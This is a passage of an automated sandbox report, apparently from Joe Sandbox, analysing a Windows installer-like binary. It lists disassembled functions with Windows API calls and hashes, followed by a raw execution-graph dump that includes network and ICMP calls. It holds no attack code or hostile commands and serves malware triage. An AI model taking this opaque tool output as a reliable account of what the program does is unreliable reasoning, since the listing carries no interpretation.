                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                    Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                    • String ID: !N~
                                                                                                                                                                                                                                                                                                    • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                    • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                                    Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                    • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                    Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                    • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                    • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                    Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                    • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                    Execution Coverage:3.5%
                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                    Signature Coverage:3.4%
                                                                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:58
                                                                                                                                                                                                                                                                                                    execution_graph 98673 e71ac5 98674 e71acd 98673->98674 98677 e2d535 98673->98677 98704 e87a87 8 API calls __fread_nolock 98674->98704 98676 e71adf 98705 e87a00 8 API calls __fread_nolock 98676->98705 98679 e4014b 8 API calls 98677->98679 98681 e2d589 98679->98681 98680 e71b09 98682 e30340 207 API calls 98680->98682 98684 e2c32d 8 API calls 98681->98684 98683 e71b30 98682->98683 98685 e71b44 98683->98685 98706 ea61a2 53 API calls _wcslen 98683->98706 98687 e2d5b3 98684->98687 98688 e4014b 8 API calls 98687->98688 98699 e2d66e ISource 98688->98699 98689 e71b61 98689->98677 98707 e87a87 8 API calls __fread_nolock 98689->98707 98691 e2c3ab 8 API calls 98701 e2d9ac ISource 98691->98701 98692 e2bed9 8 API calls 98692->98699 98693 e2b4c8 8 API calls 98693->98699 98695 e71f79 98708 e856ae 8 API calls ISource 98695->98708 98696 e71f94 98698 e2c3ab 8 API calls 98698->98699 98699->98692 98699->98693 98699->98695 98699->98696 98699->98698 98700 e2d911 ISource 98699->98700 98700->98691 98700->98701 98702 e2d9c3 98701->98702 98703 e3e30a 8 API calls ISource 98701->98703 98703->98701 98704->98676 98705->98680 98706->98689 98707->98689 98708->98696 98709 e2f4c0 98712 e3a025 98709->98712 98711 e2f4cc 98713 e3a046 98712->98713 98714 e3a0a3 98712->98714 98713->98714 98715 e30340 207 API calls 98713->98715 98718 e3a0e7 98714->98718 98721 e93fe1 81 API calls __wsopen_s 98714->98721 98719 e3a077 98715->98719 98717 e7806b 98717->98717 98718->98711 98719->98714 98719->98718 98720 e2bed9 8 API calls 98719->98720 98720->98714 98721->98717 98722 e21044 98727 e22793 98722->98727 98724 e2104a 98763 e40413 29 API calls __onexit 98724->98763 98726 e21054 98764 e22a38 98727->98764 98731 e2280a 98732 e2bf73 8 API calls 98731->98732 98733 e22814 98732->98733 98734 e2bf73 8 API calls 98733->98734 98735 e2281e 98734->98735 98736 e2bf73 8 API calls 98735->98736 98737 e22828 98736->98737 98738 e2bf73 8 API calls 98737->98738 98739 e22866 98738->98739 98740 e2bf73 8 API calls 98739->98740 98741 e22932 98740->98741 98774 e22dbc 98741->98774 98745 e22964 98746 e2bf73 8 API calls 98745->98746 98747 e2296e 98746->98747 98748 e33160 9 API calls 98747->98748 98749 e22999 98748->98749 98801 e23166 98749->98801 98751 e229b5 98752 e229c5 GetStdHandle 98751->98752 98753 e639e7 98752->98753 98754 e22a1a 98752->98754 98753->98754 98755 e639f0 98753->98755 98757 e22a27 OleInitialize 98754->98757 98756 e4014b 8 API calls 98755->98756 98758 e639f7 98756->98758 98757->98724 98808 e90ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98758->98808 98760 e63a00 98809 e912eb CreateThread 98760->98809 98762 e63a0c CloseHandle 98762->98754 98763->98726 98810 e22a91 98764->98810 98767 e22a91 8 API calls 98768 e22a70 98767->98768 98769 e2bf73 8 API calls 98768->98769 98770 e22a7c 98769->98770 98771 e28577 8 API calls 98770->98771 98772 e227c9 98771->98772 98773 e2327e 6 API calls 98772->98773 98773->98731 98775 e2bf73 8 API calls 98774->98775 98776 e22dcc 98775->98776 98777 e2bf73 8 API calls 98776->98777 98778 e22dd4 98777->98778 98817 e281d6 98778->98817 98781 e281d6 8 API calls 98782 e22de4 98781->98782 98783 e2bf73 8 API calls 98782->98783 98784 e22def 98783->98784 98785 e4014b 8 API calls 98784->98785 98786 e2293c 98785->98786 98787 e23205 98786->98787 98788 e23213 98787->98788 98789 e2bf73 8 API calls 98788->98789 98790 e2321e 98789->98790 98791 e2bf73 8 API calls 98790->98791 98792 e23229 98791->98792 98793 e2bf73 8 API calls 98792->98793 98794 e23234 98793->98794 98795 e2bf73 8 API calls 98794->98795 98796 e2323f 98795->98796 98797 e281d6 8 API calls 98796->98797 98798 e2324a 98797->98798 98799 e4014b 8 API calls 98798->98799 98800 e23251 RegisterWindowMessageW 98799->98800 98800->98745 98802 e23176 98801->98802 98803 e63c8f 98801->98803 98805 e4014b 8 API calls 98802->98805 98820 e93c4e 8 API calls 98803->98820 98807 e2317e 98805->98807 98806 e63c9a 98807->98751 98808->98760 98809->98762 98821 e912d1 14 API calls 98809->98821 98811 e2bf73 8 API calls 98810->98811 98812 e22a9c 98811->98812 98813 e2bf73 8 API calls 98812->98813 98814 e22aa4 98813->98814 98815 e2bf73 8 API calls 98814->98815 98816 e22a66 98815->98816 98816->98767 98818 e2bf73 8 API calls 98817->98818 98819 e22ddc 98818->98819 98819->98781 98820->98806 96271 e2f5e5 96274 e2cab0 96271->96274 96275 e2cacb 96274->96275 96276 e714be 96275->96276 96277 e7150c 96275->96277 96304 e2caf0 96275->96304 96280 e714c8 96276->96280 96283 e714d5 96276->96283 96276->96304 96346 ea62ff 207 API calls 2 library calls 96277->96346 96344 ea6790 207 API calls 96280->96344 96300 e2cdc0 96283->96300 96345 ea6c2d 207 API calls 2 library calls 96283->96345 96286 e3e807 39 API calls 96286->96304 96287 e7179f 96287->96287 96291 e716e8 96356 ea6669 81 API calls 96291->96356 96295 e2cdee 96299 e2cf80 39 API calls 96299->96304 96300->96295 96357 e93fe1 81 API calls __wsopen_s 96300->96357 96304->96286 96304->96291 96304->96295 96304->96299 96304->96300 96305 e30340 96304->96305 96328 e2be2d 96304->96328 96332 e3e7c1 39 API calls 96304->96332 96333 e3aa99 207 API calls 96304->96333 96334 e405b2 5 API calls __Init_thread_wait 96304->96334 96335 e3bc58 96304->96335 96340 e40413 29 API calls __onexit 96304->96340 96341 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96304->96341 96342 e3f4df 81 API calls 96304->96342 96343 e3f346 207 API calls 96304->96343 96347 e2b4c8 96304->96347 96351 e7ffaf 8 API calls 96304->96351 96352 e2bed9 96304->96352 96307 e30376 ISource 96305->96307 96306 e405b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96306->96307 96307->96306 96308 e7632b 96307->96308 96309 e4014b 8 API calls 96307->96309 96311 e31695 96307->96311 96313 e3049d ISource 96307->96313 96314 e7625a 96307->96314 96317 e75cdb 96307->96317 96319 e2bed9 8 API calls 96307->96319 96322 e2bf73 8 API calls 96307->96322 96323 e40413 29 API calls pre_c_initialization 96307->96323 96324 e76115 96307->96324 96325 e30aae ISource 96307->96325 96326 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96307->96326 96358 e31990 96307->96358 96420 e31e50 96307->96420 96433 e93fe1 81 API calls __wsopen_s 96308->96433 96309->96307 96311->96313 96318 e2bed9 8 API calls 96311->96318 96313->96304 96432 e93fe1 81 API calls __wsopen_s 96314->96432 96317->96313 96321 e2bed9 8 API calls 96317->96321 96318->96313 96319->96307 96321->96313 96322->96307 96323->96307 96430 e93fe1 81 API calls __wsopen_s 96324->96430 96431 e93fe1 81 API calls __wsopen_s 96325->96431 96326->96307 96329 e2be38 96328->96329 96330 e2be67 96329->96330 97251 e2bfa5 96329->97251 96330->96304 96332->96304 96333->96304 96334->96304 96336 e4014b 8 API calls 96335->96336 96337 e3bc65 96336->96337 96338 e2b329 8 API calls 96337->96338 96339 e3bc70 96338->96339 96339->96304 96340->96304 96341->96304 96342->96304 96343->96304 96344->96283 96345->96300 96346->96304 96348 e2b4d6 96347->96348 96350 e2b4dc 96347->96350 96349 e2bed9 8 API calls 96348->96349 96348->96350 96349->96350 96350->96304 96351->96304 96353 e2befc __fread_nolock 96352->96353 96354 e2beed 96352->96354 96353->96304 96354->96353 96355 e4017b 8 API calls 96354->96355 96355->96353 96356->96300 96357->96287 96359 e319b6 96358->96359 96360 e31a2e 96358->96360 96362 e319c3 96359->96362 96363 e76b60 96359->96363 96361 e76a4d 96360->96361 96380 e31a3d 96360->96380 96365 e76b54 96361->96365 96366 e76a58 96361->96366 96372 e76b84 96362->96372 96374 e319cd 96362->96374 96440 ea85db 207 API calls 2 library calls 96363->96440 96439 e93fe1 81 API calls __wsopen_s 96365->96439 96438 e3b35c 207 API calls 96366->96438 96367 e30340 207 API calls 96367->96380 96370 e76bb5 96375 e76be2 96370->96375 96376 e76bc0 96370->96376 96371 e31b62 ISource 96377 e319e0 ISource 96371->96377 96397 e2bed9 8 API calls 96371->96397 96400 e31a23 ISource 96371->96400 96372->96370 96379 e76b9c 96372->96379 96373 e31ba9 96393 e31bb5 96373->96393 96435 e93fe1 81 API calls __wsopen_s 96373->96435 96374->96377 96378 e2bed9 8 API calls 96374->96378 96443 ea60e6 96375->96443 96442 ea85db 207 API calls 2 library calls 96376->96442 96387 e76dd9 96377->96387 96377->96400 96517 ea808f 53 API calls __wsopen_s 96377->96517 96378->96377 96441 e93fe1 81 API calls __wsopen_s 96379->96441 96380->96367 96380->96373 96380->96377 96381 e76979 96380->96381 96384 e76908 96380->96384 96380->96393 96405 e31af4 96380->96405 96437 e93fe1 81 API calls __wsopen_s 96381->96437 96436 e93fe1 81 API calls __wsopen_s 96384->96436 96390 e76e0f 96387->96390 96541 ea81ce 65 API calls 96387->96541 96396 e2b4c8 8 API calls 96390->96396 96392 e76c81 96515 e91ad8 8 API calls 96392->96515 96393->96307 96394 e76db7 96518 e28ec0 96394->96518 96396->96400 96397->96377 96399 e76ded 96403 e28ec0 52 API calls 96399->96403 96400->96307 96402 e76c08 96450 e9148b 96402->96450 96417 e76df5 _wcslen 96403->96417 96405->96373 96434 e31ca0 8 API calls 96405->96434 96407 e76c93 96516 e2bd07 8 API calls 96407->96516 96408 e7691d ISource 96408->96371 96408->96381 96408->96400 96409 e31b55 96409->96371 96409->96373 96412 e76dbf _wcslen 96412->96387 96415 e2b4c8 8 API calls 96412->96415 96414 e76c9c 96419 e9148b 8 API calls 96414->96419 96415->96387 96417->96390 96418 e2b4c8 8 API calls 96417->96418 96418->96390 96419->96377 96424 e31e6d ISource 96420->96424 96421 e32512 96428 e31ff7 ISource 96421->96428 97250 e3be08 39 API calls 96421->97250 96424->96421 96425 e77837 96424->96425 96426 e7766b 96424->96426 96424->96428 97248 e3e322 8 API calls ISource 96424->97248 96425->96428 97249 e4d2d5 39 API calls 96425->97249 97247 e4d2d5 39 API calls 96426->97247 96428->96307 96430->96325 96431->96313 96432->96313 96433->96313 96434->96409 96435->96400 96436->96408 96437->96377 96438->96371 96439->96363 96440->96377 96441->96400 96442->96377 96444 e76bed 96443->96444 96445 ea6101 96443->96445 96444->96392 96444->96402 96542 e4017b 96445->96542 96448 ea6123 96448->96444 96551 e4014b 96448->96551 96560 e91400 8 API calls 96448->96560 96451 e91499 96450->96451 96452 e76c32 96450->96452 96451->96452 96453 e4014b 8 API calls 96451->96453 96454 e32b20 96452->96454 96453->96452 96455 e32fc0 96454->96455 96456 e32b86 96454->96456 96714 e405b2 5 API calls __Init_thread_wait 96455->96714 96458 e32ba0 96456->96458 96459 e77bd8 96456->96459 96567 e33160 96458->96567 96677 ea7af9 96459->96677 96461 e32fca 96464 e3300b 96461->96464 96715 e2b329 96461->96715 96463 e77be4 96463->96377 96469 e77bed 96464->96469 96471 e3303c 96464->96471 96467 e33160 9 API calls 96468 e32bc6 96467->96468 96468->96464 96470 e32bfc 96468->96470 96724 e93fe1 81 API calls __wsopen_s 96469->96724 96470->96469 96495 e32c18 __fread_nolock 96470->96495 96472 e2b4c8 8 API calls 96471->96472 96474 e33049 96472->96474 96722 e3e6e8 207 API calls 96474->96722 96475 e32fe4 96721 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96475->96721 96477 e77c15 96725 e93fe1 81 API calls __wsopen_s 96477->96725 96480 e32d3f 96481 e77c78 96480->96481 96482 e32d4c 96480->96482 96727 ea61a2 53 API calls _wcslen 96481->96727 96483 e33160 9 API calls 96482->96483 96485 e32d59 96483->96485 96491 e33160 9 API calls 96485->96491 96501 e32dd7 ISource 96485->96501 96486 e4014b 8 API calls 96486->96495 96487 e33082 96723 e3fe39 8 API calls 96487->96723 96488 e4017b 8 API calls 96488->96495 96490 e32f2d 96490->96377 96499 e32d73 96491->96499 96492 e330bd 96492->96377 96494 e30340 207 API calls 96494->96495 96495->96474 96495->96477 96495->96480 96495->96486 96495->96488 96495->96494 96496 e77c59 96495->96496 96495->96501 96726 e93fe1 81 API calls __wsopen_s 96496->96726 96497 e33160 9 API calls 96497->96501 96499->96501 96503 e2bed9 8 API calls 96499->96503 96501->96487 96501->96497 96502 e32e8b ISource 96501->96502 96577 ea9fe8 96501->96577 96580 eaa5b2 96501->96580 96586 ea9ffc 96501->96586 96589 eaa9ac 96501->96589 96597 e9f94a 96501->96597 96606 e3ac3e 96501->96606 96625 ea0fb8 96501->96625 96650 eaa6aa 96501->96650 96658 eaad47 96501->96658 96663 ea1858 96501->96663 96670 e9664c 96501->96670 96728 e93fe1 81 API calls __wsopen_s 96501->96728 96502->96490 96713 e3e322 8 API calls ISource 96502->96713 96503->96501 96515->96407 96516->96414 96517->96394 96519 e28ed2 96518->96519 96520 e28ed5 96518->96520 96519->96412 96521 e28f0b 96520->96521 96522 e28edd 96520->96522 96524 e66b1f 96521->96524 96527 e28f1d 96521->96527 96533 e66a38 96521->96533 97243 e45536 26 API calls 96522->97243 97246 e454f3 26 API calls 96524->97246 96525 e28eed 96531 e4014b 8 API calls 96525->96531 97244 e3fe6f 51 API calls 96527->97244 96528 e66b37 96528->96528 96532 e28ef7 96531->96532 96534 e2b329 8 API calls 96532->96534 96535 e4017b 8 API calls 96533->96535 96540 e66ab1 96533->96540 96534->96519 96536 e66a81 96535->96536 96537 e4014b 8 API calls 96536->96537 96538 e66aa8 96537->96538 96539 e2b329 8 API calls 96538->96539 96539->96540 97245 e3fe6f 51 API calls 96540->97245 96541->96399 96543 e4014b ___std_exception_copy 96542->96543 96544 e4016a 96543->96544 96547 e4016c 96543->96547 96561 e4521d 7 API calls 2 library calls 96543->96561 96544->96448 96546 e409dd 96563 e43614 RaiseException 96546->96563 96547->96546 96562 e43614 RaiseException 96547->96562 96550 e409fa 96550->96448 96552 e40150 ___std_exception_copy 96551->96552 96553 e4016a 96552->96553 96555 e4016c 96552->96555 96564 e4521d 7 API calls 2 library calls 96552->96564 96553->96448 96556 e409dd 96555->96556 96565 e43614 RaiseException 96555->96565 96566 e43614 RaiseException 96556->96566 96559 e409fa 96559->96448 96560->96448 96561->96543 96562->96546 96563->96550 96564->96552 96565->96556 96566->96559 96568 e331a1 96567->96568 96569 e3317d 96567->96569 96729 e405b2 5 API calls __Init_thread_wait 96568->96729 96576 e32bb0 96569->96576 96731 e405b2 5 API calls __Init_thread_wait 96569->96731 96572 e331ab 96572->96569 96730 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96572->96730 96574 e39f47 96574->96576 96732 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96574->96732 96576->96467 96733 ea89b6 96577->96733 96579 ea9ff8 96579->96501 96582 eaa5c5 96580->96582 96581 e28ec0 52 API calls 96583 eaa632 96581->96583 96582->96581 96585 eaa5d4 96582->96585 96873 e918a9 96583->96873 96585->96501 96587 ea89b6 119 API calls 96586->96587 96588 eaa00c 96587->96588 96588->96501 96591 eaaa08 96589->96591 96596 eaa9c8 96589->96596 96590 eaaa26 96592 e2c98d 39 API calls 96590->96592 96594 eaaa8e 96590->96594 96590->96596 96591->96590 96949 e2c98d 96591->96949 96592->96594 96917 e90372 96594->96917 96596->96501 96598 e4017b 8 API calls 96597->96598 96599 e9f95b 96598->96599 96994 e2423c 96599->96994 96602 e28ec0 52 API calls 96603 e9f97c GetEnvironmentVariableW 96602->96603 96997 e9160f 8 API calls 96603->96997 96605 e9f999 ISource 96605->96501 96607 e28ec0 52 API calls 96606->96607 96608 e3ac68 96607->96608 96609 e3bc58 8 API calls 96608->96609 96610 e3ac7f 96609->96610 96611 e2c98d 39 API calls 96610->96611 96612 e3b09b _wcslen 96610->96612 96611->96612 96613 e44d98 _strftime 40 API calls 96612->96613 96615 e26c03 8 API calls 96612->96615 96616 e3bbbe 43 API calls 96612->96616 96619 e3b1fb 96612->96619 96620 e28ec0 52 API calls 96612->96620 96622 e2c98d 39 API calls 96612->96622 96998 e2396b 96612->96998 97008 e23907 96612->97008 97012 e27ad5 96612->97012 97017 e2ad40 8 API calls __fread_nolock 96612->97017 97018 e27b1a 8 API calls 96612->97018 97019 e28577 96612->97019 96613->96612 96615->96612 96616->96612 96619->96501 96620->96612 96622->96612 96626 ea0fe1 96625->96626 96627 ea100f WSAStartup 96626->96627 96628 e2c98d 39 API calls 96626->96628 96629 ea1054 96627->96629 96649 ea1023 ISource 96627->96649 96631 ea0ffc 96628->96631 97113 e3c1f6 96629->97113 96631->96627 96634 e2c98d 39 API calls 96631->96634 96633 e28ec0 52 API calls 96635 ea1069 96633->96635 96636 ea100b 96634->96636 97118 e3f9d4 WideCharToMultiByte 96635->97118 96636->96627 96638 ea1075 inet_addr gethostbyname 96639 ea1093 IcmpCreateFile 96638->96639 96638->96649 96640 ea10d3 96639->96640 96639->96649 96641 e4017b 8 API calls 96640->96641 96642 ea10ec 96641->96642 96643 e2423c 8 API calls 96642->96643 96644 ea10f7 96643->96644 96645 ea112b IcmpSendEcho 96644->96645 96646 ea1102 IcmpSendEcho 96644->96646 96647 ea114c 96645->96647 96646->96647 96648 ea1212 IcmpCloseHandle WSACleanup 96647->96648 96648->96649 96649->96501 96651 eaa6c5 96650->96651 96653 eaa705 96650->96653 96651->96501 96652 eaa723 96652->96651 96655 e2c98d 39 API calls 